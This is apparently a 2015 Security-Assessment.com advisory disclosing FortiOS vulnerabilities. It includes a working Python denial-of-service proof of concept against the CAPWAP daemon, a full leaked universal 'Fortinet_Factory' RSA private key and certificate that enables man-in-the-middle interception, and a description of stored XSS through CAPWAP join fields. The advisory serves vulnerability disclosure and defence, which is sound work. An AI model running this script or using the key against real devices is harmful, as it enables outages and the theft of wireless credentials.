( , ) (, . '.' ) ('. ', ). , ('. ( ) ( (_,) .'), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. Fortinet FortiOS Multiple Vulnerabilities Affected Versions: Verified on FortiOS Firmware v5.0,build4457 (GA Patch 7) PDF: http://www.security-assessment.com/files/documents/advisory/Fortinet_FortiOS_Multiple_Vulnerabilities.pdf +-------------+ | Description | +-------------+ This advisory details multiple vulnerabilities found within the Fortinet FortiOS software. FortiOS is a security-hardened, purpose-built Operating System that is the foundation of all FortiGate network security platforms. A denial of service vulnerability was discovered within the CAPWAP Daemon, allowing an attacker to lock the CAPWAP Access Controller. This was achieved by sending recurring DTLS messages to the daemon. The CAPWAP daemon itself was found to suffer from a Man-In-The-Middle vulnerability, due to the nature of Fortinet’s certificate practices. A Stored Cross Site Scripting vulnerability was also discovered, allowing an attacker to send a crafted CAPWAP join request containing malicious JavaScript code. This code is subsequently rendered in the FortiOS administrative console. +--------------+ | Exploitation | +--------------+ --[ CAPWAP Daemon DTLS Denial of Service Vulnerability During the DTLS session establishment, the protocol implements a ‘HelloVerifyRequest’ send back to the client in response to the initial ‘ClientHello’. The client is then required to send a ‘ClientHello’ with a specific cookie provided in the ‘HelloVerifyRequest’. This is designed to protect against Denial of Service attacks. It was discovered that, even though the Fortinet DTLS server implements this, sending a number of initial ‘ClientHello’ requests in short succession creates a denial of service condition on the FortiOS device. The number of requests required to trigger the condition was found to be dependent on the specifications of the machine running FortiOS, however this was tested against a mid-range Fortigate device and successfully caused a Denial of Service condition with as little as ten requests. The following POC code can be used to replicate this vulnerability: #!/usr/bin/python # # FortiOS CAPWAP Control Denial Of Service POC # # This exploit will trigger a denial of service # condition on the FortiOS CAPWAP Control Daemon # by sending recurring DTLS Client Hello # messages. # # Author: Denis Andzakovic # Date: 19/08/2014 # import socket import os import time from struct import pack import binascii import argparse # Grab parameters from command line parser = argparse.ArgumentParser(description='FortiOS CAPWAP Control Server - DTLS Client Hello DOS') parser.add_argument('-d','--host', help="IP Address of the host to attack", required=True) args = parser.parse_args() randombytes = os.urandom(28) capwapreamble = "\x01\x00\x00\x00" hello = "\x16" + "\xfe\xff" + "\x00"*8 #handshake id, version, epoch and seq handshakeProtocol = "\x01" + "\x00\x00\x2c" + "\x00"*6 + "\x00\x2c" + "\xfe\xff" + pack(">i",int(time.time())) + randombytes + "\x00" + "\x00" + "\x00\x04" + "\x00\x2f\x00\x0a\x01\x00" while True: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(capwapreamble + hello + pack(">H",len(handshakeProtocol)) + handshakeProtocol, (args.host, 5246)) resp, senderaddr = sock.recvfrom(4098) cookie = resp[31:] print "[+] Got response. Cookie: " + binascii.hexlify(cookie) --[ DTLS Man-In-The-Middle Vulnerability Fortinet devices were found to use DTLS for the CAPWAP control protocol, with the CAPWAP data protocol being cleartext by default. The CAPWAP DTLS protocol was found to use a universal ‘Fortinet_Factory’ certificate and private key, the certificate authority for which is static across all Fortinet devices. A method for replacing this certificate was not found. By harvesting this certificate and key, an attacker may stage Man in the Middle attacks against any Fortinet device using the CAPWAP DTLS protocol. This allows for the retrieval of sensitive information such as wireless SSIDs and WPA passphrases. The two files, ‘Fortinet_Factory.cer’ and ‘Fortinet_Factory.key’ can be found in the /etc/cert/local directory on Fortinet devices. The following details the ‘Fortinet_Factory’ certificate and private key. By using the following certificate an attacker may stage Man in the Middle attacks against any Fortinet access point or wireless controller implementing the CAPWAP Control protocol globally. -----BEGIN CERTIFICATE----- MIIDRTCCAi2gAwIBAgIDAN9yMA0GCSqGSIb3DQEBBQUAMIGgMQswCQYDVQQGEwJV UzETMBEGA1UECBMKQ2FsaWZvcm5pYTESMBAGA1UEBxMJU3Vubnl2YWxlMREwDwYD VQQKEwhGb3J0aW5ldDEeMBwGA1UECxMVQ2VydGlmaWNhdGUgQXV0aG9yaXR5MRAw DgYDVQQDEwdzdXBwb3J0MSMwIQYJKoZIhvcNAQkBFhRzdXBwb3J0QGZvcnRpbmV0 LmNvbTAeFw0xMTA1MjYyMzExMDVaFw0zODAxMTkwMzE0MDdaMIGdMQswCQYDVQQG EwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTESMBAGA1UEBxMJU3Vubnl2YWxlMREw DwYDVQQKEwhGb3J0aW5ldDESMBAGA1UECxMJRm9ydGlHYXRlMRkwFwYDVQQDExBG VzYwQ0EzOTExMDAwMTA0MSMwIQYJKoZIhvcNAQkBFhRzdXBwb3J0QGZvcnRpbmV0 LmNvbTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAxDcSsvApqw3AsPg4T/MX eZrE2Vhj3DOGM5JNiOyp1YIt4Q0xVYB+1B3SKFEmkwjYJoMR0Q8sFnbblA81FRGR sQVxRY+DPdJne+hTVbQ93BIhMGtNAoBYwygU6/JC1e3deB2XfgkBW70Esg12ghu2 lmTHOWrIMGgW+DnIGvsuYlkCAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0B AQUFAAOCAQEAJtQ9XkyjPH9IoS9qRdxfrkvvn6MbikvPVc3IYa8eS69Etj3vlRVf GEbEvNnYHBmT7ur77goa21ozqnfmImAstW3QOINkF/FX6VHbHlvywDJEortqEVgT DlOCKPV4z91t4Yf3/v0LYmHEF056TqU5nXt3ipTTNeFgANdKCMj4mT1KG9U9XfoK aAmcoe2JDGUj9W+5P0WMVcCth5mIJ5xy1UkEvWlG2p/p1Yw3fmbNkN5SJViy/Gug yznUXeBwmQEwupwq1ZfAcXQyxTiW7DHhMXnXis0tSJlOLFQAtAs83V5Ox8MSmGE7 M94eb9JOP8cvH2bW6LW7egB/Bwrp4N421Q== -----END CERTIFICATE----- -----BEGIN RSA PRIVATE KEY----- MIICXAIBAAKBgQDENxKy8CmrDcCw+DhP8xd5msTZWGPcM4Yzkk2I7KnVgi3hDTFV gH7UHdIoUSaTCNgmgxHRDywWdtuUDzUVEZGxBXFFj4M90md76FNVtD3cEiEwa00C gFjDKBTr8kLV7d14HZd+CQFbvQSyDXaCG7aWZMc5asgwaBb4Ocga+y5iWQIDAQAB AoGAfV8/KGyCA1T3QVxpBtSptD6q9sEelW2qmzspJYsqfUz/qaP3WM2QvFINnUs0 3ZAyJHFtKeqK3hO1+6W34i1mq9lgAll7KMbAuxxmY8U87zskv9YUP46dONt+ondn nVf5OxrPTH3Zkom1CEh110BUI4hD+rEqYi+twZF5FuAXVd0CQQDv0FYVO4NMzEL+ leLvkbd+ODUTvm9rET+mxtx719DJ3JL9T7jiunPsDY/0dpGkVSyLGQg6tO2YsgrE /Vz79iO3AkEA0XVo1RkmFpoE0EZHMzkzjJFmoLEAYtLPvcg4IP6bIuAHWt54cxFB /mpN4QlhVm0+awMPH3PNWjTJ9EDFp+5KbwJACu8IvbcU6W92rnzO9/VA1HRjlx7b nZoPuN7gNpVEY6+20+3KlCvEFUMZCSBOy5tGiKD/iw2st4WGkCytDJ/QSQJBAJqq cNuSM27TEiTdECxB28+7eiXELb3LXv0LgG7UsqeA981go16Mase7pYA7VfXkuwd3 /c3Cy+sFOe8zeQB0098CQFmiDnhpV37FtUzDXkKC5a9Vc950wK9/V9vHHwFIiO6K 0+GoDb6b2HmHGvIpBmw55isanRDlC1x1EpRKw/3F0+4= -----END RSA PRIVATE KEY----- --[ Stored Cross Site Scripting Vulnerability By sending a crafted CAPWAP Join packet, a malicious entity may stage Cross Site Scripting attacks against legitimate administrative users. This is achieved by inserting malicious JavaScript code into the WTP Name or WTP Active Software Version fields within the CAPWAP Join request. The WTP Active Software Version field is a child parameter of the WTP Descriptor message element. +----------+ | Solution | +----------+ There is no official solution for these issues. All Access Controller to Wireless Termination Point (and vice-versa) traffic is recommended to be kept on a secure network and rigorously firewalled to reduce the exploitability of these vulnerabilities. +---------------------+ | Disclosure Timeline | +---------------------+ 08/10/2014 - Initial email sent to Fortinet PSIRT team. 09/10/2014 - Advisory documents sent to Fortinet. 15/10/2014 - Acknowledgement of advisories from Fortinet. 16/10/2014 - Update requested from Fortinet. 02/12/2014 - Update requested from Fortinet. 13/12/2014 - Update requested from Fortinet. 29/01/2015 - Advisory Release. +-------------------------------+ | About Security-Assessment.com | +-------------------------------+ Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research. For further information on this issue or any of our service offerings, contact us: Web www.security-assessment.com Email info () security-assessment com Phone +64 4 470 1650